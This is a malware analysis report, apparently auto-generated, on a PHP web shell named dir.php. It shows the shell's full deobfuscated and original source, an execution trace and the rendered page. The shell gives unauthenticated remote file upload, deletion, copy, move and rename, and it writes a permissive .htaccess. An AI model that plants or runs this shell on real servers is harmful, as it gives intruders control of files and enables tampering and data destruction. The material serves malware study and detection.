PHP Malware Analysis
dir.php
md5: 59d5a0e5407af0ddd443f593ece9d06d
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Environment
- error_reporting (Deobfuscated, Original, Traces)
- getcwd (Deobfuscated, Original, Traces)
- set_time_limit (Deobfuscated, Original, Traces)
Files
- copy (Deobfuscated, Original)
- move_uploaded_file (Deobfuscated, Original)
Input
- _FILES (Deobfuscated, Original)
- _GET (Deobfuscated, Original)
- _POST (Deobfuscated, Original)
Deobfuscated PHP code
<?php
if (isset($_GET['check'])) {
echo "checked";
exit;
}
if (!file_exists(".htaccess")) {
$text = "\r\nAllow from all\r\nOptions -Indexes\r\n ";
$fp = fopen(".htaccess", "w");
fwrite($fp, $text);
fclose($fp);
}
?>
<html><body>
<style type="text/css">
body{
background: #ffffff;
color: #666666;
font-family: Verdana;
font-size: 11px;
}
a:link{
color: #33CC99;
}
a:visited{
color: #269771;
}
a:hover{
text-decoration: none;
Color: #3399FF;
}
table {
font-size: 11px;
}
</style>
<?php
error_reporting(0);
set_time_limit(0);
if (empty($_GET['dir'])) {
$dir = getcwd();
} else {
$dir = $_GET['dir'];
}
chdir($dir);
$current = htmlentities($_SERVER['PHP_SELF'] . "?dir=" . $dir);
echo "<i>Server: " . $_SERVER['SERVER_NAME'] . "<br>";
echo "Current directory: " . getcwd() . "<br>";
echo "Software: " . $_SERVER['SERVER_SOFTWARE'];
echo "<br>";
echo "<br>";
echo "<form action = '" . $current . "&mode=upload' method = 'POST' ENCTYPE='multipart/form-data'>\n";
echo "Local file: <input type = 'file' name = 'upload_file'>";
echo "<input type = 'submit' value = 'Upload'>";
echo "</form><br>";
$mode = $_GET['mode'];
switch ($mode) {
case 'delete':
$file = $_GET['file'];
if (unlink($file)) {
echo $file . " deleted successfully.<p>";
} else {
echo "Unable to delete " . $file . ".<p>";
}
break;
case 'copy':
$src = $_GET['src'];
$dst = $_POST['dst'];
if (empty($dst)) {
echo "<form action = '" . $current . "&mode=copy&src=" . $src . "' method = 'POST'>\n";
echo "Destination: <input name = 'dst'><br>\n";
echo "<input type = 'submit' value = 'Copy'></form>\n";
} else {
if (copy($src, $dst)) {
echo "File copied successfully.<p>\n";
} else {
echo "Unable to copy " . $src . ".<p>\n";
}
}
break;
case 'move':
$src = $_GET['src'];
$dst = $_POST['dst'];
if (empty($dst)) {
echo "<form action = '" . $current . "&mode=move&src=" . $src . "' method = 'POST'>\n";
echo "Destination: <input name = 'dst'><br>\n";
echo "<input type = 'submit' value = 'Move'></form>\n";
} else {
if (rename($src, $dst)) {
echo "File moved successfully.<p>\n";
} else {
echo "Unable to move " . $src . ".<p>\n";
}
}
break;
case 'rename':
$old = $_GET['old'];
$new = $_POST['new'];
if (empty($new)) {
echo "<form action = '" . $current . "&mode=rename&old=" . $old . "' method = 'POST'>\n";
echo "New name: <input name = 'new'><br>\n";
echo "<input type = 'submit' value = 'Rename'></form>\n";
} else {
if (rename($old, $new)) {
echo "File/Directory renamed successfully.<p>\n";
} else {
echo "Unable to rename " . $old . ".<p>\n";
}
}
break;
case 'rmdir':
$rm = $_GET['rm'];
if (rmdir($rm)) {
echo "Directory removed successfully.<p>\n";
} else {
echo "Unable to remove " . $rm . ".<p>\n";
}
break;
case 'upload':
$temp = $_FILES['upload_file']['tmp_name'];
$file = basename($_FILES['upload_file']['name']);
if (!empty($file)) {
if (move_uploaded_file($temp, $file)) {
echo "File uploaded successfully.<p>\n";
unlink($temp);
} else {
echo "Unable to upload " . $file . ".<p>\n";
}
}
break;
}
clearstatcache();
echo "<pre>\n\n</pre>";
echo "<table width = 100%>\n";
$files = scandir($dir);
foreach ($files as $file) {
if (is_dir($file)) {
$items = scandir($file);
$items_num = count($items) - 2;
echo "<tr><td><a href = " . $current . "/" . $file . ">" . $file . "</a></td>";
echo "<td>" . $items_num . " Items</td>";
echo "<td><a href = " . $current . "&mode=rmdir&rm=" . $file . ">Remove directory</a></td>";
echo "<td>-</td>";
echo "<td>-</td>";
echo "<td><a href = " . $current . "&mode=rename&old=" . $file . ">Rename directory</a></td></tr>";
}
}
foreach ($files as $file) {
if (is_file($file)) {
$size = round(filesize($file) / 1024, 2);
echo "<tr><td>" . $file . "</td>";
echo "<td>" . $size . " KB</td>";
echo "<td><a href = " . $current . "&mode=delete&file=" . $file . ">Delete</a></td>";
echo "<td><a href = " . $current . "&mode=copy&src=" . $file . ">Copy</a></td>";
echo "<td><a href = " . $current . "&mode=move&src=" . $file . ">Move</a></td>";
echo "<td><a href = " . $current . "&mode=rename&old=" . $file . ">Remame</a></td></tr>";
}
}
echo "</table><br>";Execution traces
data/traces/59d5a0e5407af0ddd443f593ece9d06d_trace-1676254908.666.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:22:14.563824]
1 0 1 0.000245 393512
1 3 0 0.000443 420440 {main} 1 /var/www/html/uploads/dir.php 0 0
2 4 0 0.000461 420440 file_exists 0 /var/www/html/uploads/dir.php 7 1 '.htaccess'
2 4 1 0.000484 420480
2 4 R TRUE
2 5 0 0.000500 420440 error_reporting 0 /var/www/html/uploads/dir.php 42 1 0
2 5 1 0.000514 420480
2 5 R 22527
2 6 0 0.000527 420440 set_time_limit 0 /var/www/html/uploads/dir.php 43 1 0
2 6 1 0.000542 420504
2 6 R FALSE
2 7 0 0.000555 420472 getcwd 0 /var/www/html/uploads/dir.php 46 0
2 7 1 0.000568 420520
2 7 R '/var/www/html/uploads'
1 A /var/www/html/uploads/dir.php 46 $dir = '/var/www/html/uploads'
2 8 0 0.000597 420520 chdir 0 /var/www/html/uploads/dir.php 50 1 '/var/www/html/uploads'
2 8 1 0.000612 420608
2 8 R TRUE
2 9 0 0.000626 420648 htmlentities 0 /var/www/html/uploads/dir.php 51 1 '/uploads/dir.php?dir=/var/www/html/uploads'
2 9 1 0.000642 420840
2 9 R '/uploads/dir.php?dir=/var/www/html/uploads'
1 A /var/www/html/uploads/dir.php 51 $current = '/uploads/dir.php?dir=/var/www/html/uploads'
2 10 0 0.000671 420728 getcwd 0 /var/www/html/uploads/dir.php 54 0
2 10 1 0.000683 420776
2 10 R '/var/www/html/uploads'
1 A /var/www/html/uploads/dir.php 63 $mode = NULL
2 11 0 0.000713 420728 clearstatcache 0 /var/www/html/uploads/dir.php 140 0
2 11 1 0.000726 420728
2 11 R NULL
2 12 0 0.000739 420728 scandir 0 /var/www/html/uploads/dir.php 143 1 '/var/www/html/uploads'
2 12 1 0.000770 421344
2 12 R [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'dir.php', 5 => 'prepend.php']
1 A /var/www/html/uploads/dir.php 143 $files = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'dir.php', 5 => 'prepend.php']
2 13 0 0.000808 421312 is_dir 0 /var/www/html/uploads/dir.php 145 1 '.'
2 13 1 0.000822 421360
2 13 R TRUE
2 14 0 0.000835 421320 scandir 0 /var/www/html/uploads/dir.php 146 1 '.'
2 14 1 0.000858 421936
2 14 R [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'dir.php', 5 => 'prepend.php']
1 A /var/www/html/uploads/dir.php 146 $items = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'dir.php', 5 => 'prepend.php']
1 A /var/www/html/uploads/dir.php 147 $items_num = 4
2 15 0 0.000906 421904 is_dir 0 /var/www/html/uploads/dir.php 145 1 '..'
2 15 1 0.000920 421944
2 15 R TRUE
2 16 0 0.000933 421904 scandir 0 /var/www/html/uploads/dir.php 146 1 '..'
2 16 1 0.000954 422408
2 16 R [0 => '.', 1 => '..', 2 => 'uploads']
1 A /var/www/html/uploads/dir.php 146 $items = [0 => '.', 1 => '..', 2 => 'uploads']
1 A /var/www/html/uploads/dir.php 147 $items_num = 1
2 17 0 0.000997 421792 is_dir 0 /var/www/html/uploads/dir.php 145 1 '.htaccess'
2 17 1 0.001011 421840
2 17 R FALSE
2 18 0 0.001024 421800 is_dir 0 /var/www/html/uploads/dir.php 145 1 'data'
2 18 1 0.001037 421832
2 18 R TRUE
2 19 0 0.001050 421792 scandir 0 /var/www/html/uploads/dir.php 146 1 'data'
2 19 1 0.001071 422320
2 19 R [0 => '.', 1 => '..', 2 => 'trace-1676254908.666.xt.gz']
1 A /var/www/html/uploads/dir.php 146 $items = [0 => '.', 1 => '..', 2 => 'trace-1676254908.666.xt.gz']
1 A /var/www/html/uploads/dir.php 147 $items_num = 1
2 20 0 0.001115 421816 is_dir 0 /var/www/html/uploads/dir.php 145 1 'dir.php'
2 20 1 0.001129 421856
2 20 R FALSE
2 21 0 0.001142 421816 is_dir 0 /var/www/html/uploads/dir.php 145 1 'prepend.php'
2 21 1 0.001155 421864
2 21 R FALSE
2 22 0 0.001169 421824 is_file 0 /var/www/html/uploads/dir.php 157 1 '.'
2 22 1 0.001183 421856
2 22 R FALSE
2 23 0 0.001195 421816 is_file 0 /var/www/html/uploads/dir.php 157 1 '..'
2 23 1 0.001209 421856
2 23 R FALSE
2 24 0 0.001222 421816 is_file 0 /var/www/html/uploads/dir.php 157 1 '.htaccess'
2 24 1 0.001235 421864
2 24 R TRUE
2 25 0 0.001248 421824 filesize 0 /var/www/html/uploads/dir.php 158 1 '.htaccess'
2 25 1 0.001261 421864
2 25 R 64
2 26 0 0.001273 421824 round 0 /var/www/html/uploads/dir.php 158 2 0.0625 2
2 26 1 0.001287 421896
2 26 R 0.06
1 A /var/www/html/uploads/dir.php 158 $size = 0.06
2 27 0 0.001319 421824 is_file 0 /var/www/html/uploads/dir.php 157 1 'data'
2 27 1 0.001333 421856
2 27 R FALSE
2 28 0 0.001346 421816 is_file 0 /var/www/html/uploads/dir.php 157 1 'dir.php'
2 28 1 0.001359 421856
2 28 R TRUE
2 29 0 0.001372 421816 filesize 0 /var/www/html/uploads/dir.php 158 1 'dir.php'
2 29 1 0.001384 421856
2 29 R 5226
2 30 0 0.001396 421816 round 0 /var/www/html/uploads/dir.php 158 2 5.103515625 2
2 30 1 0.001409 421888
2 30 R 5.1
1 A /var/www/html/uploads/dir.php 158 $size = 5.1
2 31 0 0.001435 421816 is_file 0 /var/www/html/uploads/dir.php 157 1 'prepend.php'
2 31 1 0.001450 421864
2 31 R TRUE
2 32 0 0.001462 421824 filesize 0 /var/www/html/uploads/dir.php 158 1 'prepend.php'
2 32 1 0.001475 421864
2 32 R 57
2 33 0 0.001487 421824 round 0 /var/www/html/uploads/dir.php 158 2 0.0556640625 2
2 33 1 0.001500 421896
2 33 R 0.06
1 A /var/www/html/uploads/dir.php 158 $size = 0.06
1 3 1 0.001527 421824
0.001555 315776
TRACE END [2023-02-13 00:22:14.565172]
Generated HTML code
<html><head></head><body>
<style type="text/css">
body{
background: #ffffff;
color: #666666;
font-family: Verdana;
font-size: 11px;
}
a:link{
color: #33CC99;
}
a:visited{
color: #269771;
}
a:hover{
text-decoration: none;
Color: #3399FF;
}
table {
font-size: 11px;
}
</style>
<i>Server: localhost<br>Current directory: /var/www/html<br>Software: Apache/2.4.52 (Ubuntu)<br><br><form action="/dir.php?dir=/var/www/html&mode=upload" method="POST" enctype="multipart/form-data">
Local file: <input type="file" name="upload_file"><input type="submit" value="Upload"></form><br><pre>
</pre><table width="100%">
<tbody><tr><td><a href="/dir.php?dir=/var/www/html/.">.</a></td><td>3 Items</td><td><a href="/dir.php?dir=/var/www/html&mode=rmdir&rm=.">Remove directory</a></td><td>-</td><td>-</td><td><a href="/dir.php?dir=/var/www/html&mode=rename&old=.">Rename directory</a></td></tr><tr><td><a href="/dir.php?dir=/var/www/html/..">..</a></td><td>2 Items</td><td><a href="/dir.php?dir=/var/www/html&mode=rmdir&rm=..">Remove directory</a></td><td>-</td><td>-</td><td><a href="/dir.php?dir=/var/www/html&mode=rename&old=..">Rename directory</a></td></tr><tr><td>.htaccess</td><td>0.04 KB</td><td><a href="/dir.php?dir=/var/www/html&mode=delete&file=.htaccess">Delete</a></td><td><a href="/dir.php?dir=/var/www/html&mode=copy&src=.htaccess">Copy</a></td><td><a href="/dir.php?dir=/var/www/html&mode=move&src=.htaccess">Move</a></td><td><a href="/dir.php?dir=/var/www/html&mode=rename&old=.htaccess">Remame</a></td></tr><tr><td>beneri.se_malware_analysis</td><td>0 KB</td><td><a href="/dir.php?dir=/var/www/html&mode=delete&file=beneri.se_malware_analysis">Delete</a></td><td><a href="/dir.php?dir=/var/www/html&mode=copy&src=beneri.se_malware_analysis">Copy</a></td><td><a href="/dir.php?dir=/var/www/html&mode=move&src=beneri.se_malware_analysis">Move</a></td><td><a href="/dir.php?dir=/var/www/html&mode=rename&old=beneri.se_malware_analysis">Remame</a></td></tr><tr><td>dir.php</td><td>5.1 KB</td><td><a href="/dir.php?dir=/var/www/html&mode=delete&file=dir.php">Delete</a></td><td><a href="/dir.php?dir=/var/www/html&mode=copy&src=dir.php">Copy</a></td><td><a href="/dir.php?dir=/var/www/html&mode=move&src=dir.php">Move</a></td><td><a href="/dir.php?dir=/var/www/html&mode=rename&old=dir.php">Remame</a></td></tr></tbody></table><br></i></body></html>Original PHP code
<?php
if (isset ($_GET['check'])) {
echo "checked";
exit;
}
if (!file_exists(".htaccess")) {
$text = "
Allow from all
Options -Indexes
";
$fp = fopen(".htaccess", "w");
fwrite($fp, $text);
fclose($fp);
}
?>
<html><body>
<style type="text/css">
body{
background: #ffffff;
color: #666666;
font-family: Verdana;
font-size: 11px;
}
a:link{
color: #33CC99;
}
a:visited{
color: #269771;
}
a:hover{
text-decoration: none;
Color: #3399FF;
}
table {
font-size: 11px;
}
</style>
<?php
error_reporting (0);
set_time_limit (0);
if (empty ($_GET ['dir'])){
$dir = getcwd ();
} else {
$dir = $_GET ['dir'];
}
chdir ($dir);
$current = htmlentities ($_SERVER ['PHP_SELF'] . "?dir=" . $dir);
echo "<i>Server: " . $_SERVER ['SERVER_NAME'] . "<br>";
echo "Current directory: " . getcwd () . "<br>";
echo "Software: " . $_SERVER ['SERVER_SOFTWARE'];
echo "<br>";
echo "<br>";
echo "<form action = '" . $current . "&mode=upload' method = 'POST' ENCTYPE='multipart/form-data'>\n";
echo "Local file: <input type = 'file' name = 'upload_file'>";
echo "<input type = 'submit' value = 'Upload'>";
echo "</form><br>";
$mode = $_GET ['mode'];
switch ($mode) {
case 'delete':
$file = $_GET ['file'];
if (unlink($file)) {
echo $file . " deleted successfully.<p>";
} else {
echo "Unable to delete " . $file . ".<p>";
}
break;
case 'copy':
$src = $_GET ['src'];
$dst = $_POST ['dst'];
if (empty ($dst)) {
echo "<form action = '" . $current . "&mode=copy&src=" . $src . "' method = 'POST'>\n";
echo "Destination: <input name = 'dst'><br>\n";
echo "<input type = 'submit' value = 'Copy'></form>\n";
} else {
if (copy($src, $dst)) {
echo "File copied successfully.<p>\n";
} else {
echo "Unable to copy " . $src . ".<p>\n";
}
}
break;
case 'move':
$src = $_GET ['src'];
$dst = $_POST ['dst'];
if (empty ($dst)) {
echo "<form action = '" . $current . "&mode=move&src=" . $src . "' method = 'POST'>\n";
echo "Destination: <input name = 'dst'><br>\n";
echo "<input type = 'submit' value = 'Move'></form>\n";
} else {
if (rename($src, $dst)) {
echo "File moved successfully.<p>\n";
} else {
echo "Unable to move " . $src . ".<p>\n";
}
}
break;
case 'rename':
$old = $_GET ['old'];
$new = $_POST ['new'];
if (empty ($new)) {
echo "<form action = '" . $current . "&mode=rename&old=" . $old . "' method = 'POST'>\n";
echo "New name: <input name = 'new'><br>\n";
echo "<input type = 'submit' value = 'Rename'></form>\n";
} else {
if (rename($old, $new)) {
echo "File/Directory renamed successfully.<p>\n";
} else {
echo "Unable to rename " . $old . ".<p>\n";
}
}
break;
case 'rmdir':
$rm = $_GET ['rm'];
if (rmdir($rm)) {
echo "Directory removed successfully.<p>\n";
} else {
echo "Unable to remove " . $rm . ".<p>\n";
}
break;
case 'upload':
$temp = $_FILES['upload_file']['tmp_name'];
$file = basename($_FILES['upload_file']['name']);
if (!empty ($file)) {
if (move_uploaded_file($temp, $file)) {
echo "File uploaded successfully.<p>\n";
unlink($temp);
} else {
echo "Unable to upload " . $file . ".<p>\n";
}
}
break;
}
clearstatcache ();
echo "<pre>\n\n</pre>";
echo "<table width = 100%>\n";
$files = scandir ($dir);
foreach ($files as $file){
if (is_dir ($file)){
$items = scandir ($file);
$items_num = count ($items) - 2;
echo "<tr><td><a href = ".$current . "/" . $file.">".$file."</a></td>";
echo "<td>".$items_num." Items</td>";
echo "<td><a href = ".$current . "&mode=rmdir&rm=".$file.">Remove directory</a></td>";
echo "<td>-</td>";
echo "<td>-</td>";
echo "<td><a href = ".$current . "&mode=rename&old=".$file.">Rename directory</a></td></tr>";
}
}
foreach ($files as $file){
if (is_file ($file)){
$size = round (filesize ($file) / 1024, 2);
echo "<tr><td>".$file."</td>";
echo "<td>".$size." KB</td>";
echo "<td><a href = ".$current . "&mode=delete&file=".$file.">Delete</a></td>";
echo "<td><a href = ".$current . "&mode=copy&src=".$file.">Copy</a></td>";
echo "<td><a href = ".$current . "&mode=move&src=".$file.">Move</a></td>";
echo "<td><a href = ".$current . "&mode=rename&old=".$file.">Remame</a></td></tr>";
}
}
echo "</table><br>";